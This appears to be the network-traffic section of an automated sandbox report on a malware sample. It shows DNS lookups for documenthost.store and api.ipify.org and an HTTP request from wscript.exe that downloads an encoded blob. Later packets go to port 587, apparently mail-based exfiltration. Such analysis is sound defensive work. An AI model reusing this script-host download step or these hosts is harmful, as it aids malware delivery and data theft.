Nov 12, 2024 13:39:52.154772043 CET | 49706 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:52.154788017 CET | 443 | 49706 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:52.154825926 CET | 49706 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:52.164184093 CET | 443 | 49706 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:52.164247036 CET | 49706 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:52.189239979 CET | 443 | 49706 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:52.189280033 CET | 443 | 49706 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:52.189416885 CET | 49706 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:52.189416885 CET | 49706 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:52.189439058 CET | 443 | 49706 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:52.231563091 CET | 49706 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:52.271415949 CET | 443 | 49706 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:52.271496058 CET | 49706 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:52.271711111 CET | 443 | 49706 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:52.271775007 CET | 49706 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:52.281583071 CET | 443 | 49706 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:52.281639099 CET | 49706 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:52.306514978 CET | 443 | 49706 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:52.306591988 CET | 49706 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:52.351959944 CET | 443 | 49706 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:52.352029085 CET | 49706 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:52.388758898 CET | 443 | 49706 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:52.388835907 CET | 49706 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:52.389045954 CET | 443 | 49706 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:52.389096022 CET | 49706 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:52.389898062 CET | 443 | 49706 | 172.67.215.48 | 192.168.2.5
Nov 12, 2024 13:39:52.389952898 CET | 49706 | 443 | 192.168.2.5 | 172.67.215.48
Nov 12, 2024 13:39:52.423856020 CET | 443 | 49706 | 172.67.215.48 | 192.168.2.5
                                                    Nov 12, 2024 13:39:52.423923016 CET49706443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:52.469172001 CET44349706172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:52.469291925 CET49706443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:52.506051064 CET44349706172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:52.506089926 CET44349706172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:52.506130934 CET49706443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:52.506145954 CET44349706172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:52.506160975 CET49706443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:52.506808996 CET44349706172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:52.506856918 CET49706443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:52.506864071 CET44349706172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:52.506912947 CET49706443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:52.540704966 CET44349706172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:52.540769100 CET49706443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:52.586672068 CET44349706172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:52.586740971 CET49706443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:52.623016119 CET44349706172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:52.623090982 CET49706443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:52.623255014 CET44349706172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:52.623284101 CET44349706172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:52.623306036 CET49706443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:52.623325109 CET44349706172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:52.623341084 CET49706443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:52.623697042 CET44349706172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:52.623749018 CET49706443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:52.623756886 CET44349706172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:52.657546997 CET44349706172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:52.657603979 CET49706443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:52.657614946 CET44349706172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:52.657653093 CET49706443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:52.704055071 CET44349706172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:52.704230070 CET49706443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:52.774688005 CET44349706172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:52.774708986 CET44349706172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:52.774774075 CET49706443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:52.774795055 CET44349706172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:52.774821043 CET49706443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:52.774846077 CET49706443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:52.857625008 CET44349706172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:52.857687950 CET44349706172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:52.857794046 CET49706443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:52.857794046 CET49706443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:52.857811928 CET44349706172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:52.891935110 CET44349706172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:52.891977072 CET44349706172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:52.892015934 CET49706443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:52.892035007 CET44349706172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:52.892070055 CET49706443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:52.892359018 CET49706443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:52.974323034 CET44349706172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:52.974443913 CET49706443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:52.974632025 CET44349706172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:52.974689007 CET49706443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:52.974762917 CET44349706172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:52.974822044 CET49706443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:52.975332022 CET44349706172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:52.975385904 CET49706443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:53.091486931 CET44349706172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:53.091525078 CET44349706172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:53.091588020 CET49706443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:53.091603994 CET44349706172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:53.091660976 CET49706443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:53.091660976 CET49706443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:53.092374086 CET44349706172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:53.092428923 CET49706443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:53.092436075 CET44349706172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:53.125941992 CET44349706172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:53.126019001 CET49706443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:53.126034021 CET44349706172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:53.126075983 CET49706443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:53.126096964 CET44349706172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:53.126152992 CET49706443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:53.208616018 CET44349706172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:53.208655119 CET44349706172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:53.208709955 CET49706443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:53.208729982 CET44349706172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:53.208775043 CET49706443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:53.209043980 CET44349706172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:53.209119081 CET49706443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:53.243262053 CET44349706172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:53.243310928 CET44349706172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:53.243422985 CET49706443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:53.243422985 CET49706443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:53.243446112 CET44349706172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:53.294069052 CET49706443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:53.330271959 CET44349706172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:53.330284119 CET44349706172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:53.330321074 CET44349706172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:53.330352068 CET44349706172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:53.330358982 CET49706443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:53.330383062 CET44349706172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:53.330415010 CET49706443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:53.330429077 CET49706443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:53.360960960 CET44349706172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:53.360985994 CET44349706172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:53.361073971 CET49706443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:53.361087084 CET44349706172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:53.361104012 CET49706443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:53.403495073 CET49706443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:53.419517994 CET44349706172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:53.443665028 CET44349706172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:53.443706036 CET44349706172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:53.443722010 CET44349706172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:53.443778038 CET49706443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:53.443793058 CET44349706172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:53.443841934 CET49706443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:53.443841934 CET49706443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:53.477618933 CET44349706172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:53.477829933 CET49706443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:53.477907896 CET44349706172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:53.477974892 CET49706443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:53.477984905 CET44349706172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:53.478029966 CET49706443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:53.537524939 CET44349706172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:53.537638903 CET49706443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:53.537655115 CET44349706172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:53.560956001 CET44349706172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:53.560998917 CET44349706172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:53.561079979 CET49706443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:53.561099052 CET44349706172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:53.561175108 CET49706443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:53.561175108 CET49706443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:53.594934940 CET44349706172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:53.594976902 CET44349706172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:53.595026016 CET49706443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:53.595032930 CET44349706172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:53.595077038 CET49706443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:53.595496893 CET44349706172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:53.595556021 CET49706443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:53.595563889 CET44349706172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:53.637837887 CET49706443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:53.677809000 CET44349706172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:53.677843094 CET44349706172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:53.677890062 CET49706443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:53.677900076 CET44349706172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:53.677932978 CET49706443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:53.677944899 CET49706443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:53.718182087 CET44349706172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:53.718219042 CET44349706172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:53.718265057 CET49706443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:53.718276978 CET44349706172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:53.718308926 CET49706443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:53.754564047 CET44349706172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:53.754643917 CET49706443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:53.754667044 CET44349706172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:53.754743099 CET49706443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:53.771239996 CET44349706172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:53.771336079 CET44349706172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:53.771349907 CET49706443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:53.771401882 CET49706443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:53.772464037 CET49706443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:53.772464037 CET49706443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:53.772486925 CET44349706172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:53.772501945 CET44349706172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:40:04.031270981 CET49709443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:40:04.031342030 CET44349709172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:40:04.031421900 CET49709443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:40:04.031707048 CET49709443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:40:04.031728029 CET44349709172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:40:04.633090973 CET44349709172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:40:04.633177042 CET49709443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:40:04.634656906 CET49709443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:40:04.634677887 CET44349709172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:40:04.634973049 CET44349709172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:40:04.635859013 CET49709443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:40:04.679336071 CET44349709172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:40:05.028769016 CET44349709172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:40:05.028826952 CET44349709172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:40:05.028919935 CET49709443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:40:05.029380083 CET49709443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:40:05.029400110 CET44349709172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:40:05.029412031 CET49709443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:40:05.029417038 CET44349709172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:40:05.288558006 CET49712443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:40:05.288621902 CET44349712172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:40:05.288706064 CET49712443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:40:05.288980007 CET49712443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:40:05.288996935 CET44349712172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:40:05.930186033 CET44349712172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:40:05.930252075 CET49712443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:40:05.961549044 CET49712443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:40:05.961604118 CET44349712172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:40:05.961872101 CET44349712172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:40:05.979307890 CET49712443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:40:06.027329922 CET44349712172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:40:06.382245064 CET44349712172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:40:06.382287025 CET44349712172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:40:06.382311106 CET44349712172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:40:06.382347107 CET49712443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:40:06.382380962 CET44349712172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:40:06.382400036 CET44349712172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:40:06.382462025 CET49712443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:40:06.382462025 CET49712443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:40:06.382754087 CET49712443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:40:06.382771015 CET44349712172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:40:06.382787943 CET49712443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:40:06.382792950 CET44349712172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:41:09.504411936 CET49981443192.168.2.5104.26.12.205
                                                    Nov 12, 2024 13:41:09.504451036 CET44349981104.26.12.205192.168.2.5
                                                    Nov 12, 2024 13:41:09.504549026 CET49981443192.168.2.5104.26.12.205
                                                    Nov 12, 2024 13:41:09.526463032 CET49981443192.168.2.5104.26.12.205
                                                    Nov 12, 2024 13:41:09.526488066 CET44349981104.26.12.205192.168.2.5
                                                    Nov 12, 2024 13:41:10.167783022 CET44349981104.26.12.205192.168.2.5
                                                    Nov 12, 2024 13:41:10.167850971 CET49981443192.168.2.5104.26.12.205
                                                    Nov 12, 2024 13:41:10.170207977 CET49981443192.168.2.5104.26.12.205
                                                    Nov 12, 2024 13:41:10.170219898 CET44349981104.26.12.205192.168.2.5
                                                    Nov 12, 2024 13:41:10.170456886 CET44349981104.26.12.205192.168.2.5
                                                    Nov 12, 2024 13:41:10.215429068 CET49981443192.168.2.5104.26.12.205
                                                    Nov 12, 2024 13:41:10.248986006 CET49981443192.168.2.5104.26.12.205
                                                    Nov 12, 2024 13:41:10.295341969 CET44349981104.26.12.205192.168.2.5
                                                    Nov 12, 2024 13:41:10.426990032 CET44349981104.26.12.205192.168.2.5
                                                    Nov 12, 2024 13:41:10.427061081 CET44349981104.26.12.205192.168.2.5
                                                    Nov 12, 2024 13:41:10.427212000 CET49981443192.168.2.5104.26.12.205
                                                    Nov 12, 2024 13:41:10.435894012 CET49981443192.168.2.5104.26.12.205
                                                    Nov 12, 2024 13:41:11.652475119 CET49983587192.168.2.5162.254.34.31
                                                    Nov 12, 2024 13:41:11.658385038 CET58749983162.254.34.31192.168.2.5
                                                    Nov 12, 2024 13:41:11.658462048 CET49983587192.168.2.5162.254.34.31
                                                    Nov 12, 2024 13:41:12.449523926 CET58749983162.254.34.31192.168.2.5
                                                    Nov 12, 2024 13:41:12.449799061 CET49983587192.168.2.5162.254.34.31
                                                    Nov 12, 2024 13:41:12.455122948 CET58749983162.254.34.31192.168.2.5
                                                    Nov 12, 2024 13:41:12.609038115 CET58749983162.254.34.31192.168.2.5
                                                    Nov 12, 2024 13:41:12.609981060 CET49983587192.168.2.5162.254.34.31
                                                    Nov 12, 2024 13:41:12.615017891 CET58749983162.254.34.31192.168.2.5
                                                    Nov 12, 2024 13:41:12.769959927 CET58749983162.254.34.31192.168.2.5
                                                    Nov 12, 2024 13:41:12.770906925 CET49983587192.168.2.5162.254.34.31
                                                    Nov 12, 2024 13:41:12.775801897 CET58749983162.254.34.31192.168.2.5
                                                    Nov 12, 2024 13:41:12.947962046 CET58749983162.254.34.31192.168.2.5
                                                    Nov 12, 2024 13:41:12.948215961 CET49983587192.168.2.5162.254.34.31
                                                    Nov 12, 2024 13:41:12.953165054 CET58749983162.254.34.31192.168.2.5
                                                    Nov 12, 2024 13:41:13.107741117 CET58749983162.254.34.31192.168.2.5
                                                    Nov 12, 2024 13:41:13.110208035 CET49983587192.168.2.5162.254.34.31
                                                    Nov 12, 2024 13:41:13.115219116 CET58749983162.254.34.31192.168.2.5
                                                    Nov 12, 2024 13:41:13.271050930 CET58749983162.254.34.31192.168.2.5
                                                    Nov 12, 2024 13:41:13.274245024 CET49983587192.168.2.5162.254.34.31
                                                    Nov 12, 2024 13:41:13.279223919 CET58749983162.254.34.31192.168.2.5
                                                    Nov 12, 2024 13:41:13.433584929 CET58749983162.254.34.31192.168.2.5
                                                    Nov 12, 2024 13:41:13.436835051 CET49983587192.168.2.5162.254.34.31
                                                    Nov 12, 2024 13:41:13.436878920 CET49983587192.168.2.5162.254.34.31
                                                    Nov 12, 2024 13:41:13.436908007 CET49983587192.168.2.5162.254.34.31
                                                    Nov 12, 2024 13:41:13.436924934 CET49983587192.168.2.5162.254.34.31
                                                    Nov 12, 2024 13:41:13.441798925 CET58749983162.254.34.31192.168.2.5
                                                    Nov 12, 2024 13:41:13.441808939 CET58749983162.254.34.31192.168.2.5
                                                    Nov 12, 2024 13:41:13.441896915 CET58749983162.254.34.31192.168.2.5
                                                    Nov 12, 2024 13:41:13.441906929 CET58749983162.254.34.31192.168.2.5
                                                    Nov 12, 2024 13:41:13.600332022 CET58749983162.254.34.31192.168.2.5
                                                    Nov 12, 2024 13:41:13.653059006 CET49983587192.168.2.5162.254.34.31
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 12, 2024 13:39:47.388715029 CET | 59200 | 53 | 192.168.2.5 | 1.1.1.1
Nov 12, 2024 13:39:47.441085100 CET | 53 | 59200 | 1.1.1.1 | 192.168.2.5
Nov 12, 2024 13:41:09.464888096 CET | 55321 | 53 | 192.168.2.5 | 1.1.1.1
Nov 12, 2024 13:41:09.471939087 CET | 53 | 55321 | 1.1.1.1 | 192.168.2.5
                                                    Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                    Nov 12, 2024 13:39:47.388715029 CET | 192.168.2.5 | 1.1.1.1 | 0xb996 | Standard query (0) | documenthost.store | A (IP address) | IN (0x0001) | false
                                                    Nov 12, 2024 13:41:09.464888096 CET | 192.168.2.5 | 1.1.1.1 | 0x8d2d | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
                                                    Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                    Nov 12, 2024 13:39:47.441085100 CET | 1.1.1.1 | 192.168.2.5 | 0xb996 | No error (0) | documenthost.store | | 172.67.215.48 | A (IP address) | IN (0x0001) | false
                                                    Nov 12, 2024 13:39:47.441085100 CET | 1.1.1.1 | 192.168.2.5 | 0xb996 | No error (0) | documenthost.store | | 104.21.45.141 | A (IP address) | IN (0x0001) | false
                                                    Nov 12, 2024 13:41:09.471939087 CET | 1.1.1.1 | 192.168.2.5 | 0x8d2d | No error (0) | api.ipify.org | | 104.26.12.205 | A (IP address) | IN (0x0001) | false
                                                    Nov 12, 2024 13:41:09.471939087 CET | 1.1.1.1 | 192.168.2.5 | 0x8d2d | No error (0) | api.ipify.org | | 172.67.74.152 | A (IP address) | IN (0x0001) | false
                                                    Nov 12, 2024 13:41:09.471939087 CET | 1.1.1.1 | 192.168.2.5 | 0x8d2d | No error (0) | api.ipify.org | | 104.26.13.205 | A (IP address) | IN (0x0001) | false
                                                    • documenthost.store
                                                    • api.ipify.org
                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    0 | 192.168.2.5 | 49704 | 172.67.215.48 | 443 | 7252 | C:\Windows\System32\wscript.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2024-11-12 12:39:48 UTC | 158 | OUT | GET /2910/s HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: documenthost.store
                                                    2024-11-12 12:39:48 UTC | 817 | IN | HTTP/1.1 200 OK
                                                    Date: Tue, 12 Nov 2024 12:39:48 GMT
                                                    Content-Length: 27312
                                                    Connection: close
                                                    Last-Modified: Wed, 02 Oct 2024 01:26:13 GMT
                                                    ETag: "6ab0-6237452d358f3"
                                                    Accept-Ranges: bytes
                                                    cf-cache-status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=72rmsUZ72JBQbM3383%2F8QxxTQQPzOBIzAyqq54QNo4EjzJu08hmUQ9EAe2n8PnEtYsRdxiE%2BEJmmCiJkc6DF3G0%2FcW2xRkrM1y2p5uU0lIYwc8bMvy7p7ugNl59YpPOuN7pRGF0%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8e16963e2a547d57-DFW
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1073&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2845&recv_bytes=772&delivery_rate=2656880&cwnd=251&unsent_bytes=0&cid=ac80482f3b709666&ts=455&x=0"
                                                    2024-11-12 12:39:48 UTC552INData Raw: 33 44 33 44 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34
                                                    Data Ascii: 3D3D41414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414
